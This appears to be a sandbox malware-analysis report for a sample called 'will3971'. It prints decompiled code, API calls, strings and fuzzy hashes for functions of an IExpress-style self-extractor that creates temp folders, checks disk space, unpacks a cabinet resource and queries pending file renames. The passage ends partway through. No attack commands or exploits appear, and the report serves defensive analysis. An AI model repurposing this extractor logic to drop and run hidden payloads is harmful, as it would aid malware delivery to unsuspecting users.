Part of subcall function 002F597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 002F59AF

Strings

Z, xrefs: 002F570A
msdownld.tmp, xrefs: 002F57D3
A:\, xrefs: 002F56F4
RUNPROGRAM, xrefs: 002F55BD, 002F5600
<None>, xrefs: 002F5632
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F56AE, 002F56B3, 002F583D

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-3896789798
Opcode ID: b719c4f3f089e94db522993fe665092ae402d3136b3dad8a5e8fa1de3b2cb423
Instruction ID: 49e142827dba413652187053af3df6a92bbe20dce1392b2c7fcb730888014bcd
Opcode Fuzzy Hash: b719c4f3f089e94db522993fe665092ae402d3136b3dad8a5e8fa1de3b2cb423
Instruction Fuzzy Hash: EC811C70A2492D9ADB24AF74AC59BFAF29D9B513D0F400075F786D2191DFB08DE1CE50

Uniqueness

Uniqueness Score: -1.00%

Function 002F597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E002F597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x2f8004; // 0x404cc811
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x2f9124 = E002F6285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E002F44B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x2f9a34 & 0x00000008;
							if(( *0x2f9a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x2f9a38; // 0x0
								_t110 =  *((intOrPtr*)(0x2f89e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x2f9124 = 0;
									_t66 = 1;
								} else {
									_t66 = E002F268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x2f9a38; // 0x0
							_t110 =  *((intOrPtr*)(0x2f89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x2f89e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x2f9a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E002F44B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x2f9124 = E002F6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E002F44B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x2f9124 = E002F6285();
					_t66 = 0;
					L33:
					return E002F6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x002f597d
0x002f5988
0x002f598f
0x002f599a
0x002f59a6
0x002f59a8
0x002f59af
0x002f59b9
0x002f59dd
0x002f59e4
0x002f59f1
0x002f59fe
0x002f5a0b
0x002f5a13
0x002f5a19
0x002f5a1b
0x002f5ba1
0x002f5baf
0x002f5bbd
0x002f5bd8
0x002f5bde
0x002f5be3
0x002f5bec
0x002f5bf0
0x002f5bfc
0x002f5c02
0x002f5c02
0x002f5c02
0x002f5c04
0x002f5c04
0x00000000
0x002f5c04
0x002f5a27
0x002f5a3a
0x002f5a46
0x002f5a48
0x002f5a4a
0x00000000
0x00000000
0x002f5a64
0x002f5a6a
0x002f5a6c
0x002f5abc
0x002f5ac2
0x002f5ac9
0x002f5aca
0x002f5aca
0x002f5acc
0x002f5acc
0x002f5acf
0x002f5ad1
0x00000000
0x00000000
0x002f5ad3
0x002f5ad6
0x002f5ad8
0x00000000
0x00000000
0x002f5ada
0x002f5adc
0x002f5add
0x002f5add
0x002f5ae0
0x00000000
0x00000000
0x00000000
0x002f5ae0
0x002f5ae2
0x002f5ae4
0x002f5ae6
0x002f5ae6
0x002f5ae6
0x002f5ae9
0x002f5aeb
0x002f5af0
0x002f5af6
0x002f5af8
0x002f5af9
0x002f5af9
0x002f5afb
0x00000000
0x00000000
0x002f5afd
0x002f5aff
0x002f5b00
0x002f5b03
0x00000000
0x00000000
0x00000000
0x002f5b03
0x002f5b05
0x002f5b08
0x002f5b20
0x002f5b27
0x002f5b52
0x002f5b52
0x002f5b5b
0x002f5b62
0x002f5b6b
0x002f5b6d
0x002f5b76
0x002f5b7d
0x002f5b83
0x002f5b7f
0x002f5b7f
0x002f5b7f
0x002f5b6f
0x002f5b72
0x002f5b72
0x002f5b85
0x002f5b98
0x002f5b9e
0x002f5b87
0x002f5b8f
0x002f5b8f
0x00000000
0x002f5b85
0x002f5b29
0x002f5b33
0x00000000
0x00000000
0x002f5b35
0x002f5b48
0x002f5b4a
0x00000000
0x002f5b4a
0x002f5b0f
0x002f5b16
0x00000000
0x002f5b16
0x002f5a7c
0x002f5a8a
0x002f5aa5
0x002f5aab
0x00000000
0x002f59bb
0x002f59c0
0x002f59c7
0x002f59d1
0x002f59d6
0x002f5c05
0x002f5c14
0x002f5c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 002F59A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 002F59AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 002F5A13
MulDiv.KERNEL32(?,?,00000400), ref: 002F5A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 002F5A64
memset.MSVCRT ref: 002F5A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 002F5A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 002F5AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 002F5BFC

Part of subcall function 002F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
Part of subcall function 002F44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554

Part of subcall function 002F6285: GetLastError.KERNEL32(002F5BBC), ref: 002F6285

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: 658f39830429c3674705932ebd6f8d4b3dbe05732f4d10733b872eae8cb8c94e
Instruction ID: 207644cb8de6e5d646f20373e051cc56ccb8492ae6a8d8d99bd0cee03c1fe1c3
Opcode Fuzzy Hash: 658f39830429c3674705932ebd6f8d4b3dbe05732f4d10733b872eae8cb8c94e
Instruction Fuzzy Hash: DA7181B191021DABEB159F60DC89FFBB7ACEB48394F0440BAF645D2144DA709E95CF20

Uniqueness

Uniqueness Score: -1.00%

Function 002F4FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E002F4FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x2f9144 = E002F468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x2f9140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x2f8584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x2f8584, 0x841), 5);
				}
				_t10 = E002F4EFD(0, 0);
				if(_t10 != 0) {
					__imp__#20(E002F4CA0, E002F4CC0, E002F4980, E002F4A50, E002F4AD0, E002F4B60, E002F4BC0, 1, 0x2f9148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x2f9148; // 0x0
						_t24 =  *0x2f8584; // 0x0
						E002F44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x2f1140, 0, E002F4CD0, 0, 0x2f9140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x2f8584; // 0x0
					E002F44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x2f9140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x2f9140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x2f91d8; // 0x0
						if(_t47 == 0) {
							E002F44B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x2f8a38 & 0x00000001) == 0 && ( *0x2f9a34 & 0x00000001) == 0) {
						SendMessageA( *0x2f8584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x002f4fe0
0x002f4fe6
0x002f4ff9
0x002f500d
0x002f5013
0x002f501a
0x002f5163
0x002f5163
0x002f5020
0x002f5027
0x002f5037
0x002f5051
0x002f5051
0x002f5057
0x002f505e
0x002f50a7
0x002f50ad
0x002f50b4
0x002f50e8
0x002f50e8
0x002f50ee
0x002f50ff
0x002f5104
0x002f5106
0x00000000
0x002f5106
0x002f50cd
0x002f50d3
0x002f50da
0x00000000
0x00000000
0x002f50dd
0x002f50e6
0x00000000
0x00000000
0x00000000
0x002f5060
0x002f5060
0x002f5070
0x002f5075
0x002f5107
0x002f5107
0x002f510e
0x002f5111
0x002f5117
0x002f5117
0x002f511f
0x002f5121
0x002f5127
0x002f5135
0x002f5135
0x002f5127
0x002f5141
0x002f5159
0x002f5159
0x00000000
0x002f515f

APIs

Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46A0
Part of subcall function 002F468F: SizeofResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46A9
Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46C3
Part of subcall function 002F468F: LoadResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46CC
Part of subcall function 002F468F: LockResource.KERNEL32(00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46D3
Part of subcall function 002F468F: memcpy_s.MSVCRT ref: 002F46E5
Part of subcall function 002F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 002F4FFE
LoadResource.KERNEL32(00000000,00000000), ref: 002F5006
LockResource.KERNEL32(00000000), ref: 002F500D
GetDlgItem.USER32(00000000,00000842), ref: 002F5030
ShowWindow.USER32(00000000), ref: 002F5037
GetDlgItem.USER32(00000841,00000005), ref: 002F504A
ShowWindow.USER32(00000000), ref: 002F5051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 002F5111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 002F5159

Strings

*MEMCAB, xrefs: 002F50C7
CABINET, xrefs: 002F4FE6, 002F4FF7

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: f0c43200beb07915e5e95e82d0a1bc1d7bcabd550980d769674afbc2d3a61be6
Instruction ID: 8df80f59515a0d900245c18bae27fe6e74e815c266a0657de8b377f989be6cae
Opcode Fuzzy Hash: f0c43200beb07915e5e95e82d0a1bc1d7bcabd550980d769674afbc2d3a61be6
Instruction Fuzzy Hash: 6831F5B075031A6BE7206B65BD8EF37F65CAB06BE4F050035FB0DA2291DBA59C60CA50

Uniqueness

Uniqueness Score: -1.00%

Function 002F53A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E002F53A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x2f8004; // 0x404cc811
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E002F171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E002F1680(_t32, 0x104, _t20);
					E002F658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E002F6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x2f8a20 = 1;
				goto L5;
			}

0x002f53ac
0x002f53b3
0x002f53b9
0x002f53bb
0x002f53bd
0x002f53bf
0x002f53d1
0x002f53d6
0x002f53e0
0x002f53e2
0x002f53f5
0x002f53fb
0x002f5402
0x002f540b
0x00000000
0x00000000
0x002f5413
0x00000000
0x00000000
0x002f5415
0x002f5416
0x002f5427
0x002f542a
0x002f542b
0x002f5434
0x002f5434
0x002f543a
0x002f544c
0x002f544c
0x002f5452
0x002f545a
0x00000000
0x00000000
0x002f545e
0x002f545f
0x00000000

APIs

Part of subcall function 002F171E: _vsnprintf.MSVCRT ref: 002F1750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F53FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F5402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F5434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F5452

Strings

IXP, xrefs: 002F5419
IXP%03d.TMP, xrefs: 002F53C0
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F53B7, 002F53E1, 002F541E

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-2818522747
Opcode ID: 0b73e671ab033b9641ec607cddf56df7564ac3204487751c8897c3bd0db69139
Instruction ID: acc0c24ac5bde5b0d17540c6bdb0cca65aca298d270133f34e3940b49636bf8e
Opcode Fuzzy Hash: 0b73e671ab033b9641ec607cddf56df7564ac3204487751c8897c3bd0db69139
Instruction Fuzzy Hash: 2911E6B131151867D7109F26BC4DFBBB65DDFC17A1F400079B74AD2190DE748962CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 002F5467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E002F5467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x2f8004; // 0x404cc811
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x2f91e4;
					_t42 = 0x104;
					E002F1680(0x2f91e4, 0x104);
					L14:
					_t13 = E002F58C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x2f9124 = 0;
							_t14 = 1;
							L24:
							return E002F6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E002F597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x2f8a20; // 0x0
						if(_t61 != 0) {
							 *0x2f8a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x2f9124 = E002F6285();
						goto L22;
					}
					 *0x2f8a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E002F53A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x2f91e4;
				E002F1781(0x2f91e4, 0x104, __ecx,  &_v268);
				if(( *0x2f9a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E002F658A(_t48, 0x104, 0x2f1140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E002F658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x002f5472
0x002f5479
0x002f5481
0x002f5484
0x002f551c
0x002f5521
0x002f5528
0x002f552d
0x002f552f
0x002f5539
0x002f554d
0x002f554d
0x002f5552
0x002f5585
0x002f5585
0x002f558b
0x002f558d
0x002f559d
0x002f559d
0x002f5557
0x002f555e
0x00000000
0x00000000
0x002f5560
0x002f5566
0x002f5569
0x002f556f
0x002f556f
0x002f5581
0x002f5581
0x00000000
0x002f5581
0x002f5545
0x002f557c
0x00000000
0x002f557c
0x002f5547
0x00000000
0x002f5547
0x002f548a
0x002f5490
0x002f5497
0x00000000
0x00000000
0x002f549d
0x002f54ab
0x002f54b4
0x002f54c0
0x002f550c
0x002f5511
0x002f5515
0x00000000
0x002f5515
0x002f54c9
0x002f54d6
0x002f54d8
0x002f54fe
0x002f5503
0x002f5507
0x00000000
0x002f5507
0x002f54da
0x002f54dd
0x002f54f7
0x00000000
0x002f54f7
0x002f54df
0x002f54e2
0x002f54f0
0x00000000
0x002f54f0
0x002f54e7
0x00000000
0x00000000
0x002f54e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F54C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F556F

Part of subcall function 002F53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F53FB
Part of subcall function 002F53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F5402
Part of subcall function 002F53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F541F
Part of subcall function 002F53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F542B
Part of subcall function 002F53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F5434

Strings

ppc, xrefs: 002F54E9
alpha, xrefs: 002F54F0
i386, xrefs: 002F54FE
mips, xrefs: 002F54F7
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F547D, 002F5481, 002F54AB, 002F551C, 002F553C, 002F5568

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-787463151
Opcode ID: edb63c69fd107a82ed7622035706f3229d39166c5c95218984a46efcb3240a86
Instruction ID: b07a5480e53a4ed57a4acfad6d7e9b982f48870d9f24b675226783e593dc80ee
Opcode Fuzzy Hash: edb63c69fd107a82ed7622035706f3229d39166c5c95218984a46efcb3240a86
Instruction Fuzzy Hash: 6531F871730A2E97CB105F25AC48E7FF69AAF817D0B94017AAB05D2540DA748E71CA91

Uniqueness

Uniqueness Score: -1.00%

Function 002F256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E002F256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E002F24E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x002f2572
